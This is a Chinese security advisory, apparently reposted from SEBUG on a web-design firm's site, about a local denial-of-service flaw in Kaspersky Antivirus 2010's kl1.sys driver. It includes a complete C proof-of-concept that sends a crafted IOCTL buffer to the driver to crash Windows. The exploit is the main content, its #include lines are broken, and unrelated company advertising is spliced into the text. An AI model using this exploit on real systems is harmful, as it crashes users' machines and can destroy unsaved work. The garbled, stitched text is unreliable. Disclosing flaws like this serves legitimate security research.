KasperskyAnti-Viruskl1.sys驱动本地拒绝服务漏洞

影响版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463

公司主营业务：做网站、成都网站建设、移动网站开发等业务。帮助企业客户真正实现互联网宣传，提高企业的竞争能力。创新互联是一支青春激扬、勤奋敬业、活力青春激扬、勤奋敬业、活力澎湃、和谐高效的团队。公司秉承以“开放、自由、严谨、自律”为核心的企业文化，感谢他们对我们的高要求，感谢他们从不同领域给我们带来的挑战，让我们激情的团队有机会用头脑与智慧不断的给客户带来惊喜。创新互联推出阜新免费做网站回馈大家。

漏洞描述: BUGTRAQ  ID: 37044

Kaspersky Antivirus是非常流行的杀毒软件。

Kaspersky杀毒软件所使用的kl1.sys驱动没有检查IOCTL的输入地址，如果用户修改了一个或两个DWORD就可以触发异常，导致系统蓝屏死机。

<*参考  Heurs （heurs@ghostsinthstack.org） *>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#include

#include

#include

#include

#include

int __cdecl main(int argc, char* argv[]) 
{ 
    HANDLE hDevice = (HANDLE) 0xffffffff; 
    DWORD NombreByte; 
    DWORD Crashing[] = { 
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 
         0xb5ebadc5 
        }; 
    BYTE Out[0x20]; 
     
    printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); 
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); 
     
    DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL); 
     
    printf("Sploit Send.\nhDevice = %x\n", hDevice); 
    CloseHandle(hDevice); 
    getch(); 
    return 0; 
} 

SEBUG安全建议:

厂商补丁：

Kaspersky Labs

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kaspersky.com/

【编辑推荐】

1. Cisco IOS MSFC2 畸形二层帧远程拒绝服务安全缺陷
2. Sun OpenSolaris内核Panic远程拒绝服务漏洞
3. 谷歌发布Android安全漏洞补丁修复两个DoS漏洞

网站名称：KasperskyAnti-Viruskl1.sys驱动本地拒绝服务漏洞
当前链接：http://www.shufengxianlan.com/qtweb/news47/278097.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联